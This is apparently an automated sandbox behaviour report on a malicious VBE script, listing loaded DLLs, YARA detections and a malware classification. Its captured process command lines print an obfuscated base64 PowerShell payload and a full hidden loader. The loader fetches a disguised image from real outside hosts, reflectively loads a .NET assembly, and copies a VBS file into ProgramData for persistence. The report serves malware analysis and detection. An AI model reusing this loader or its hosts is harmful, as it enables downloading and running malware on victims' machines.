Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: Process Memory Space: powershell.exe PID: 4600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3564, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBE@11/8@3/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa0kiksk.2zz.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }Jump to behavior
